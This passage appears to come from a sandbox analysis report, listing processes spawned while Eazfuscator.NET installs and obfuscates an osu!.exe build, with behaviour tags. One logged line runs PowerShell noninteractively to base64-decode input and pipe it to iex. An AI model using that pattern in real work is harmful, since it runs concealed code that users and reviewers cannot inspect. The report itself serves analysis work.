      Suspicious behavior: EnumeratesProcesses
      PID:432
    - - C:\Program Files (x86)\Gapotchenko\Eazfuscator.NET\eazfuscator.net.exe
        
        "C:\Program Files (x86)\Gapotchenko\Eazfuscator.NET\eazfuscator.net.exe" --int-tool merger PHkV2QhJqz0uk0GvYSpoCqPTXOmiRpxE3 /closed "/out:C:\Users\Admin\AppData\Local\Temp\Eazfuscator.NET\Shadow Copy\pid_432_wj2ctmpg.tbg\1446d86a-2a5e-462f-8acb-37d086aa2c4c\osu!.exe" "C:\Users\Admin\Desktop\PublicNoUpdate\osu!.exe" /targetplatform:v4,"C:\Windows\Microsoft.NET\Framework\v4.0.30319" /private /compatibilityVersion:2024.2 /lib:C:\Users\Admin\Desktop\PublicNoUpdate /lib:C:\Windows\Microsoft.NET\Framework\v4.0.30319\WPF "/lib:C:\Program Files (x86)\Gapotchenko\Eazfuscator.NET\SDKs\.NET" "C:\Users\Admin\Desktop\PublicNoUpdate\osu!common.dll" C:\Users\Admin\Desktop\PublicNoUpdate\SmartThreadPool.dll C:\Users\Admin\Desktop\PublicNoUpdate\Newtonsoft.Json.dll
        5⤵
        Executes dropped EXE
        
        PID:2016
    - - C:\Program Files (x86)\Gapotchenko\Eazfuscator.NET\eazfuscator.net.exe
        
        "C:\Program Files (x86)\Gapotchenko\Eazfuscator.NET\eazfuscator.net.exe" --int-tool ildasm "/OUT=C:\Users\Admin\AppData\Local\Temp\Eazfuscator.NET\Instances\tivcfkqa.nj4\3gz5raqk.mhh\osu!.il" /TEXT /NOBAR /RAWEH /QUOTEALLNAMES /UTF8 "C:\Users\Admin\AppData\Local\Temp\Eazfuscator.NET\Shadow Copy\pid_432_wj2ctmpg.tbg\1446d86a-2a5e-462f-8acb-37d086aa2c4c\osu!.exe"
        5⤵
        Executes dropped EXE
        
        PID:2956
    - - C:\Program Files (x86)\Gapotchenko\Eazfuscator.NET\eazfuscator.net.exe
        
        "C:\Program Files (x86)\Gapotchenko\Eazfuscator.NET\eazfuscator.net.exe" --int-tool ilasm /LongGenericParameterIndexFixups "/OUTPUT=C:\Users\Admin\Desktop\PublicNoUpdate\osu!.exe" /nologo /quiet /OPTIMIZE /FOLD /MDV=v4.0.30319 "/resource=C:\Users\Admin\AppData\Local\Temp\Eazfuscator.NET\Instances\tivcfkqa.nj4\3gz5raqk.mhh\osu!.res" C:\Users\Admin\AppData\Local\Temp\Eazfuscator.NET\Instances\tivcfkqa.nj4\3gz5raqk.mhh\002847d6-8999-4080-9cd9-d2cad5e68378.il
        5⤵
        Executes dropped EXE
        
        PID:4500
    - - C:\Program Files (x86)\Gapotchenko\Eazfuscator.NET\eazfuscator.net.exe
        
        "C:\Program Files (x86)\Gapotchenko\Eazfuscator.NET\eazfuscator.net.exe" --int-tool ilasm /OUTPUT=C:\Users\Admin\AppData\Local\Temp\Eazfuscator.NET\Instances\tivcfkqa.nj4\3gz5raqk.mhh\0esmhgp3.5wn.dll /nologo /quiet /OPTIMIZE /FOLD /DLL /MDV=v4.0.30319 C:\Users\Admin\AppData\Local\Temp\Eazfuscator.NET\Instances\tivcfkqa.nj4\3gz5raqk.mhh\0esmhgp3.5wn.il
        5⤵
        Executes dropped EXE
        
        PID:5432

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Enumerates connected drives
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
PID:3816
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding 4E61A7DB2A4EC3560D1F672C3C56C661 C
  2⤵
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  PID:5156
- - C:\Windows\SysWOW64\rundll32.exe
    rundll32.exe "C:\Users\Admin\AppData\Local\Temp\MSIFEBE.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_240713640 1 Eazfuscator.NET.Setup.Logic!Eazfuscator.NET.Setup.Logic.Install.SearchProducts
    3⤵
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    PID:5476
- C:\Windows\system32\srtasks.exe
  C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2
  2⤵
  PID:5676
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding A46C9E692F24C527A998D0171EB2C8F7
  2⤵
  - System Location Discovery: System Language Discovery
  PID:5616
- - C:\Windows\SysWOW64\rundll32.exe
    rundll32.exe "C:\Windows\Installer\MSI501A.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_240734281 2 Eazfuscator.NET.Setup.Logic!Eazfuscator.NET.Setup.Logic.Install.ValidateInstall
    3⤵
    - Drops file in Windows directory
    - System Location Discovery: System Language Discovery
    PID:5592
- - C:\Windows\SysWOW64\rundll32.exe
    rundll32.exe "C:\Windows\Installer\MSI52CA.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_240734937 105 Eazfuscator.NET.Setup.Logic!Eazfuscator.NET.Setup.Logic.Install.InitializeInstall
    3⤵
    - Drops file in Windows directory
    - System Location Discovery: System Language Discovery
    PID:3448
- - C:\Windows\SysWOW64\rundll32.exe
    rundll32.exe "C:\Windows\Installer\MSI5482.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_240735359 112 Eazfuscator.NET.Setup.Logic!Eazfuscator.NET.Setup.Logic.Billboard.SwitchBillboard
    3⤵
    - Drops file in Windows directory
    - System Location Discovery: System Language Discovery
    PID:5872
- - C:\Windows\SysWOW64\rundll32.exe
    rundll32.exe "C:\Windows\Installer\MSI553E.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_240735546 119 Eazfuscator.NET.Setup.Logic!Eazfuscator.NET.Setup.Logic.Billboard.SwitchBillboard
    3⤵
    - Drops file in Windows directory
    - System Location Discovery: System Language Discovery
    PID:4880
- - C:\Windows\SysWOW64\rundll32.exe
    rundll32.exe "C:\Windows\Installer\MSI581E.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_240736296 126 Eazfuscator.NET.Setup.Logic!Eazfuscator.NET.Setup.Logic.Billboard.SwitchBillboard
    3⤵
    - Drops file in Windows directory
    - System Location Discovery: System Language Discovery
    PID:3576
- - C:\Windows\SysWOW64\rundll32.exe
    rundll32.exe "C:\Windows\Installer\MSI7481.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_240743562 143 Eazfuscator.NET.Setup.Logic!Eazfuscator.NET.Setup.Logic.Billboard.HoldBillboard
    3⤵
    - Drops file in Windows directory
    - System Location Discovery: System Language Discovery
    PID:1428
- - C:\Windows\SysWOW64\rundll32.exe
    rundll32.exe "C:\Windows\Installer\MSI84EE.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_240747765 152 Eazfuscator.NET.Setup.Logic!Eazfuscator.NET.Setup.Logic.Billboard.SwitchBillboard
    3⤵
    - Drops file in Windows directory
    - System Location Discovery: System Language Discovery
    PID:4300
- - C:\Program Files (x86)\Gapotchenko\Eazfuscator.NET\eazfuscator.net.exe
    "C:\Program Files (x86)\Gapotchenko\Eazfuscator.NET\eazfuscator.net.exe" /installer_VZP1lntvzc0 mode install-user upgrade "" parameters ""
    3⤵
    - Executes dropped EXE
    PID:5912
  - - C:\Program Files (x86)\Gapotchenko\Eazfuscator.NET\eazfuscator.net.exe
      "C:\Program Files (x86)\Gapotchenko\Eazfuscator.NET\eazfuscator.net.exe" --install-user uH0I5fAL25I
      4⤵
      Executes dropped EXE
      PID:1532
- - C:\Windows\SysWOW64\rundll32.exe
    rundll32.exe "C:\Windows\Installer\MSI8CFF.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_240749812 161 Eazfuscator.NET.Setup.Logic!Eazfuscator.NET.Setup.Logic.Billboard.HoldBillboard
    3⤵
    - Drops file in Windows directory
    - System Location Discovery: System Language Discovery
    PID:3876
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding 43FD176B7430D0E69B516AAB5DB0C090 E Global\MSI0000
  2⤵
  - System Location Discovery: System Language Discovery
  PID:4192
- - C:\Program Files (x86)\Gapotchenko\Eazfuscator.NET\eazfuscator.net.exe
    "C:\Program Files (x86)\Gapotchenko\Eazfuscator.NET\eazfuscator.net.exe" /installer_VZP1lntvzc0 mode install upgrade "" parameters ""
    3⤵
    - Executes dropped EXE
    - Modifies data under HKEY_USERS
    - Suspicious behavior: EnumeratesProcesses
    PID:4396
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe
      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe" install "C:\Program Files (x86)\Gapotchenko\Eazfuscator.NET\Components\Vendor\System.Buffers.dll" "/ExeConfig:C:\Program Files (x86)\Gapotchenko\Eazfuscator.NET\eazfuscator.net.exe" /queue:3 /nologo /silent
      4⤵
      PID:5944
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe
      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe" install "C:\Program Files (x86)\Gapotchenko\Eazfuscator.NET\Components\Vendor\System.Runtime.CompilerServices.Unsafe.dll" "/ExeConfig:C:\Program Files (x86)\Gapotchenko\Eazfuscator.NET\eazfuscator.net.exe" /queue:3 /nologo /silent
      4⤵
      PID:4020
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe
      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe" install "C:\Program Files (x86)\Gapotchenko\Eazfuscator.NET\Components\Vendor\System.Collections.Immutable.dll" "/ExeConfig:C:\Program Files (x86)\Gapotchenko\Eazfuscator.NET\eazfuscator.net.exe" /queue:3 /nologo /silent
      4⤵
      PID:4464
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe
      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe" install "C:\Program Files (x86)\Gapotchenko\Eazfuscator.NET\Components\Vendor\Gapotchenko.Components.G1206.dll" "/ExeConfig:C:\Program Files (x86)\Gapotchenko\Eazfuscator.NET\eazfuscator.net.exe" /queue:3 /nologo /silent
      4⤵
      PID:2020
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe
      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe" install "C:\Program Files (x86)\Gapotchenko\Eazfuscator.NET\Components\Vendor\Irony.dll" "/ExeConfig:C:\Program Files (x86)\Gapotchenko\Eazfuscator.NET\eazfuscator.net.exe" /queue:3 /nologo /silent
      4⤵
      PID:5068
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe
      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe" install "C:\Program Files (x86)\Gapotchenko\Eazfuscator.NET\Components\Vendor\ICSharpCode.SharpZipLib.dll" "/ExeConfig:C:\Program Files (x86)\Gapotchenko\Eazfuscator.NET\eazfuscator.net.exe" /queue:3 /nologo /silent
      4⤵
      PID:988
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe
      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe" install "C:\Program Files (x86)\Gapotchenko\Eazfuscator.NET\Components\Vendor\protobuf-net.dll" "/ExeConfig:C:\Program Files (x86)\Gapotchenko\Eazfuscator.NET\eazfuscator.net.exe" /queue:3 /nologo /silent
      4⤵
      PID:1748
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe
      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe" install "C:\Program Files (x86)\Gapotchenko\Eazfuscator.NET\Components\Vendor\ColorCode.dll" "/ExeConfig:C:\Program Files (x86)\Gapotchenko\Eazfuscator.NET\eazfuscator.net.exe" /queue:3 /nologo /silent
      4⤵
      PID:5816
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe
      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe" install "C:\Program Files (x86)\Gapotchenko\Eazfuscator.NET\Components\Vendor\RestSharp.dll" "/ExeConfig:C:\Program Files (x86)\Gapotchenko\Eazfuscator.NET\eazfuscator.net.exe" /queue:3 /nologo /silent
      4⤵
      PID:5872
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe
      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe" install "C:\Program Files (x86)\Gapotchenko\Eazfuscator.NET\Components\Vendor\YamlDotNet.dll" "/ExeConfig:C:\Program Files (x86)\Gapotchenko\Eazfuscator.NET\eazfuscator.net.exe" /queue:3 /nologo /silent
      4⤵
      PID:4472
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe
      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe" install "C:\Program Files (x86)\Gapotchenko\Eazfuscator.NET\Components\Vendor\Microsoft.WindowsAPICodePack.dll" "/ExeConfig:C:\Program Files (x86)\Gapotchenko\Eazfuscator.NET\eazfuscator.net.exe" /queue:3 /nologo /silent
      4⤵
      PID:4680
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe
      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe" install "C:\Program Files (x86)\Gapotchenko\Eazfuscator.NET\Components\Vendor\Microsoft.WindowsAPICodePack.Shell.dll" "/ExeConfig:C:\Program Files (x86)\Gapotchenko\Eazfuscator.NET\eazfuscator.net.exe" /queue:3 /nologo /silent
      4⤵
      PID:4844
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe
      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe" install "C:\Program Files (x86)\Gapotchenko\Eazfuscator.NET\Components\Vendor\AG.Configuration.SettingsProviders.dll" "/ExeConfig:C:\Program Files (x86)\Gapotchenko\Eazfuscator.NET\eazfuscator.net.exe" /queue:3 /nologo /silent
      4⤵
      PID:2520
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe
      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe" install "C:\Program Files (x86)\Gapotchenko\Eazfuscator.NET\Components\Vendor\AG.Deployment.Updating.dll" "/ExeConfig:C:\Program Files (x86)\Gapotchenko\Eazfuscator.NET\eazfuscator.net.exe" /queue:3 /nologo /silent
      4⤵
      PID:2996
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe
      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe" install "C:\Program Files (x86)\Gapotchenko\Eazfuscator.NET\Components\Vendor\TurboXaml.dll" "/ExeConfig:C:\Program Files (x86)\Gapotchenko\Eazfuscator.NET\eazfuscator.net.exe" /queue:3 /nologo /silent
      4⤵
      PID:4952
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe
      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe" install "C:\Program Files (x86)\Gapotchenko\Eazfuscator.NET\Components\Gapotchenko.Eazfuscator.NET.Resources.dll" "/ExeConfig:C:\Program Files (x86)\Gapotchenko\Eazfuscator.NET\eazfuscator.net.exe" /queue:3 /nologo /silent
      4⤵
      PID:924
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe
      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe" install "C:\Program Files (x86)\Gapotchenko\Eazfuscator.NET\Components\Gapotchenko.Eazfuscator.NET.Deployment.dll" "/ExeConfig:C:\Program Files (x86)\Gapotchenko\Eazfuscator.NET\eazfuscator.net.exe" /queue:3 /nologo /silent
      4⤵
      PID:2364
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe
      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe" install "C:\Program Files (x86)\Gapotchenko\Eazfuscator.NET\Components\Gapotchenko.Eazfuscator.NET.Deployment.Prerequisites.dll" "/ExeConfig:C:\Program Files (x86)\Gapotchenko\Eazfuscator.NET\eazfuscator.net.exe" /queue:3 /nologo /silent
      4⤵
      PID:1456
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe
      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe" install "C:\Program Files (x86)\Gapotchenko\Eazfuscator.NET\Components\Gapotchenko.Eazfuscator.NET.Configuration.dll" "/ExeConfig:C:\Program Files (x86)\Gapotchenko\Eazfuscator.NET\eazfuscator.net.exe" /queue:3 /nologo /silent
      4⤵
      PID:4996
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe
      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe" install "C:\Program Files (x86)\Gapotchenko\Eazfuscator.NET\Components\Gapotchenko.Eazfuscator.NET.Configuration.Settings.dll" "/ExeConfig:C:\Program Files (x86)\Gapotchenko\Eazfuscator.NET\eazfuscator.net.exe" /queue:3 /nologo /silent
      4⤵
      PID:4076
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe
      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe" install "C:\Program Files (x86)\Gapotchenko\Eazfuscator.NET\Components\Gapotchenko.Eazfuscator.NET.Ceip.dll" "/ExeConfig:C:\Program Files (x86)\Gapotchenko\Eazfuscator.NET\eazfuscator.net.exe" /queue:3 /nologo /silent
      4⤵
      PID:5752
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe
      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe" install "C:\Program Files (x86)\Gapotchenko\Eazfuscator.NET\Components\Gapotchenko.Eazfuscator.NET.FileSwarm.dll" "/ExeConfig:C:\Program Files (x86)\Gapotchenko\Eazfuscator.NET\eazfuscator.net.exe" /queue:3 /nologo /silent
      4⤵
      PID:3912
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe
      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe" install "C:\Program Files (x86)\Gapotchenko\Eazfuscator.NET\Components\Gapotchenko.Eazfuscator.NET.Deployment.Installer.dll" "/ExeConfig:C:\Program Files (x86)\Gapotchenko\Eazfuscator.NET\eazfuscator.net.exe" /queue:3 /nologo /silent
      4⤵
      PID:5464
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe
      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe" install "C:\Program Files (x86)\Gapotchenko\Eazfuscator.NET\Components\Gapotchenko.Eazfuscator.NET.Updating.dll" "/ExeConfig:C:\Program Files (x86)\Gapotchenko\Eazfuscator.NET\eazfuscator.net.exe" /queue:3 /nologo /silent
      4⤵
      PID:2332
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe
      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe" install "C:\Program Files (x86)\Gapotchenko\Eazfuscator.NET\Components\Eazfuscator.NET.Assistant.Communication.dll" "/ExeConfig:C:\Program Files (x86)\Gapotchenko\Eazfuscator.NET\eazfuscator.net.exe" /queue:3 /nologo /silent
      4⤵
      PID:2612
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe
      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe" install "C:\Program Files (x86)\Gapotchenko\Eazfuscator.NET\Components\Eazfuscator.NET.Assistant.Options.dll" "/ExeConfig:C:\Program Files (x86)\Gapotchenko\Eazfuscator.NET\eazfuscator.net.exe" /queue:3 /nologo /silent
      4⤵
      PID:4960
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe
      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe" install "C:\Program Files (x86)\Gapotchenko\Eazfuscator.NET\Components\Eazfuscator.NET.Assistant.Endpoint.dll" "/ExeConfig:C:\Program Files (x86)\Gapotchenko\Eazfuscator.NET\eazfuscator.net.exe" /queue:3 /nologo /silent
      4⤵
      PID:3708
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe
      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe" install "C:\Program Files (x86)\Gapotchenko\Eazfuscator.NET\Integration\MSBuild\Eazfuscator.NET.MakeAppxWrapper.exe" /queue:3 /nologo /silent
      4⤵
      PID:3020
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe
      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe" install "C:\Program Files (x86)\Gapotchenko\Eazfuscator.NET\Integration\MSBuild\net40\Eazfuscator.NET.Integration.MSBuild.Tasks.dll" "/ExeConfig:C:\Program Files (x86)\Gapotchenko\Eazfuscator.NET\eazfuscator.net.exe" /queue:3 /nologo /silent
      4⤵
      PID:3720
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe
      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe" install "C:\Program Files (x86)\Gapotchenko\Eazfuscator.NET\Components\Eazfuscator.NET CEIP.exe" /queue:3 /nologo /silent
      4⤵
      PID:820
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe
      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe" install "C:\Program Files (x86)\Gapotchenko\Eazfuscator.NET\eazfuscator.net.exe" /queue:3 /nologo /silent
      4⤵
      PID:8
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe
      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe" install "C:\Program Files (x86)\Gapotchenko\Eazfuscator.NET\Eazfuscator.NET Assistant.exe" /queue:2 /nologo /silent
      4⤵
      PID:2932
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe
      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe" install "C:\Program Files (x86)\Gapotchenko\Eazfuscator.NET\Components\Eazfuscator.NET Enlightenment.exe" /nologo /silent
      4⤵
      PID:5312
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 1c4 -InterruptEvent 0 -NGENProcess 1b4 -Pipe 1c0 -Comment "NGen Worker Process"
        5⤵
        
        PID:4560
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 260 -InterruptEvent 0 -NGENProcess 280 -Pipe 24c -Comment "NGen Worker Process"
        5⤵
        
        PID:3960
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 290 -InterruptEvent 0 -NGENProcess 284 -Pipe 28c -Comment "NGen Worker Process"
        5⤵
        
        PID:5032
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 2ac -InterruptEvent 0 -NGENProcess 2d0 -Pipe 2b0 -Comment "NGen Worker Process"
        5⤵
        Drops file in Windows directory
        
        PID:5488
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 280 -InterruptEvent 0 -NGENProcess 260 -Pipe 288 -Comment "NGen Worker Process"
        5⤵
        
        PID:2940
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 2a8 -InterruptEvent 0 -NGENProcess 2b8 -Pipe 2ac -Comment "NGen Worker Process"
        5⤵
        
        PID:2176
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 264 -InterruptEvent 0 -NGENProcess 2a8 -Pipe 280 -Comment "NGen Worker Process"
        5⤵
        Drops file in Windows directory
        
        PID:4856
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 2d0 -InterruptEvent 0 -NGENProcess 2bc -Pipe 284 -Comment "NGen Worker Process"
        5⤵
        
        PID:4448
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 2dc -InterruptEvent 0 -NGENProcess 2b4 -Pipe 2d8 -Comment "NGen Worker Process"
        5⤵
        
        PID:2884
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 2f4 -InterruptEvent 0 -NGENProcess 2ec -Pipe 2f0 -Comment "NGen Worker Process"
        5⤵
        
        PID:3992
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 2e0 -InterruptEvent 0 -NGENProcess 264 -Pipe 2e8 -Comment "NGen Worker Process"
        5⤵
        Drops file in Windows directory
        
        PID:3976
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 2c8 -InterruptEvent 0 -NGENProcess 2dc -Pipe 2ec -Comment "NGen Worker Process"
        5⤵
        
        PID:4512
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 304 -InterruptEvent 0 -NGENProcess 30c -Pipe 2fc -Comment "NGen Worker Process"
        5⤵
        Drops file in Windows directory
        
        PID:5268
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 2c0 -InterruptEvent 0 -NGENProcess 2c8 -Pipe 2b4 -Comment "NGen Worker Process"
        5⤵
        
        PID:5352
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 264 -InterruptEvent 0 -NGENProcess 304 -Pipe 2c0 -Comment "NGen Worker Process"
        5⤵
        
        PID:1228
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 2f8 -InterruptEvent 0 -NGENProcess 2e4 -Pipe 300 -Comment "NGen Worker Process"
        5⤵
        
        PID:3864
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 328 -InterruptEvent 0 -NGENProcess 31c -Pipe 324 -Comment "NGen Worker Process"
        5⤵
        
        PID:2016
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 328 -InterruptEvent 0 -NGENProcess 348 -Pipe 330 -Comment "NGen Worker Process"
        5⤵
        Drops file in Windows directory
        
        PID:6016
  - - C:\Program Files (x86)\Gapotchenko\Eazfuscator.NET\eazfuscator.net.exe
      "C:\Program Files (x86)\Gapotchenko\Eazfuscator.NET\eazfuscator.net.exe" --install uH0I5fAL25I
      4⤵
      Executes dropped EXE
      Modifies data under HKEY_USERS
      PID:2504
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -noninteractive -command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($input)) | iex"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Modifies data under HKEY_USERS
      Suspicious behavior: EnumeratesProcesses
      PID:2684
- - C:\Program Files (x86)\Gapotchenko\Eazfuscator.NET\eazfuscator.net.exe
    "C:\Program Files (x86)\Gapotchenko\Eazfuscator.NET\eazfuscator.net.exe" /installer_VZP1lntvzc0 mode install comment commit upgrade "" parameters "" installed "" orgdb "C:\Users\Admin\Downloads\Eazfuscator.NET 2024.2 Setup.msi" pc "{F3006C7B-6BAD-4795-911A-655DF23227BD}"
    3⤵
    - Executes dropped EXE
    - NTFS ADS
    PID:1984

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Checks SCSI registry key(s)
PID:384

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:5568

C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Desktop\PublicNoUpdate\" -spe -an -ai#7zMap10775:86:7zEvent18563
1⤵
PID:1232

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
1⤵
PID:5544
- C:\Program Files\Mozilla Firefox\firefox.exe
  "C:\Program Files\Mozilla Firefox\firefox.exe"
  2⤵
  - Checks processor information in registry
  - Modifies registry class
  - NTFS ADS
  - Suspicious use of SetWindowsHookEx
  PID:1832
